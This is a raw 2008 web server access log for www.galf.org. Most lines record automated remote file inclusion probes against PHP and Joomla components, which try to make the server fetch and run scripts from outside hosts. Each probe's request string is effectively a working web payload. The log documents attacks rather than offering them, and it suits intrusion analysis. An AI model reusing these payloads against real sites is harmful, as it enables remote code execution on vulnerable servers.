218.237.64.193 - - [17/Feb/2008:20:53:04 -0800] "GET /logs/access_070917.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://barnwellweb.com/modules/MDForum/includes/us/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
67.195.44.110 - - [17/Feb/2008:20:55:14 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.88 - - [17/Feb/2008:20:55:15 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:20:55:44 -0800] "GET /page.php?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.77.102.172 - - [17/Feb/2008:20:56:54 -0800] "GET /logs/access_080114.log/includes/login.php?_SESSION[docroot_path]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:20:57:04 -0800] "GET /logs/order/login.php?svr_rootscript=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:20:57:04 -0800] "GET /logs/order/login.php?svr_rootscript=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:20:57:05 -0800] "GET /order/login.php?svr_rootscript=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
205.234.195.11 - - [17/Feb/2008:20:58:05 -0800] "GET /logs/access_070917.log/test.php?page=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.195.11 - - [17/Feb/2008:20:58:05 -0800] "GET /test.php?page=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.195.11 - - [17/Feb/2008:20:58:05 -0800] "GET /logs/test.php?page=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:58:21 -0800] "GET //include.php?path[docroot]=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:58:22 -0800] "GET /logs//include.php?path[docroot]=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:58:22 -0800] "GET //include.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:58:22 -0800] "GET //include.php?path[docroot]=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:58:22 -0800] "GET /logs//include.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
153.19.101.68 - - [17/Feb/2008:20:58:27 -0800] "GET /page.php?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
153.19.101.68 - - [17/Feb/2008:20:58:27 -0800] "GET /page.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:58:27 -0800] "GET /logs//include.php?path[docroot]=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
205.234.195.11 - - [17/Feb/2008:20:59:32 -0800] "GET /logs/access_070917.log/test.php?page=http://www.geocities.com/rha.mutzz/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.195.11 - - [17/Feb/2008:20:59:32 -0800] "GET /test.php?page=http://www.geocities.com/rha.mutzz/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.195.11 - - [17/Feb/2008:20:59:32 -0800] "GET /logs/test.php?page=http://www.geocities.com/rha.mutzz/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.149.238.27 - - [17/Feb/2008:21:01:04 -0800] "GET /page.php?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [17/Feb/2008:21:02:08 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
205.234.195.11 - - [17/Feb/2008:21:04:44 -0800] "GET /logs/access_070917.log//index.php?option=com_content&task=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.195.11 - - [17/Feb/2008:21:04:45 -0800] "GET //index.php?option=com_content&task=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.195.11 - - [17/Feb/2008:21:04:45 -0800] "GET /logs//index.php?option=com_content&task=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:21:04:52 -0800] "GET /logs/access_070917.log/page.php?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.g